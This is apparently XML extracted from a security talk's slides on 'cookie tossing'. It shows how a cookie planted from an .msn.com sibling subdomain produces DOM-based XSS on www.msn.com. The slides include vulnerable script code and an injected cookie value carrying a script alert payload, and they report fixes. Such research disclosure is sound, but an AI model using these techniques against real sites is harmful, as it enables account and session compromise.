              <a:t>OWA has fixed this issue, and they had quite the patch matrix.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fix was the same, the construct is fine if you tie it to something unique to the user and session that cannot be modified.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187084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Cookie Tossing: XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If your cookie wins (is first) with the right cookie, you can have persistent(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ish</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SPLOITED: Found a cookie in an MSN shared library</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>that resulted in a DOM based XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>on any site that hosted the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Merely needed to find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in any other subdomain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>And I did not want to use “path”.  I wanted the crown jewel: http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>www.msn.com </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3118676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XSS Through a Cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="263237" y="2503922"/>
            <a:ext cx="6389891" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>c=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>prd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unescape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GetCookieValue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>c,'PRD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>querystring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+='?PRD='+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>prd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>='http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://j.lsx.com/?"+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>querystring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+"'&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;");</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="263237" y="4513083"/>
            <a:ext cx="8385617" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unction </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GetCookieValue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cookiestring,cookiename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RegExp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("\\b"+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cookiename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+"\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s*=\\s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*([^;]*)","i")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="263237" y="1901457"/>
            <a:ext cx="6009979" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Set-Cookie: PRD=4032; domain=.msn.com; path=/;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="4999741"/>
            <a:ext cx="533400" cy="4104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116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Cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ame Case </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nsensitivityishness</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” and “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” are treated as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>different</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> cookies in the browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many script libraries will do a case insensitive regex search on the cookie string, or call “.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ToLower</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>()” then “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>indexOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>()”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ASP.NET will do a case insensitive search.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Request.Cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CaseDoesntMatteR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>] will return the first “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>casedoesntmatter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” in the cookie string, regardless of case.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2013619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XSS Through a Cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In the case of www.msn.com, we could add a cookie “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>prd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” to the cookie string, which makes the cookie string appear as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Cookie: PRD=4032;prd=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;&lt;script&gt;alert()&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Thankfully, some other JavaScript cleared (expired) the PRD cookie, then reset it, bumping mine to the front of the line:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>prd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script&gt;alert()&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> PRD=4032;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="68554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Easy Part: XSS on a Sibling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>As is the case with this form of cookie placement, it’s a lot easier if you just find an XSS bug in a sibling domain. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Quickly found a stray html file with a reflected DOM Based XSS living in a weird domain ending in .msn.com.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Crafted a link to that html file, which placed my malicious cookie, redirected to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.msn.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> . . .</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
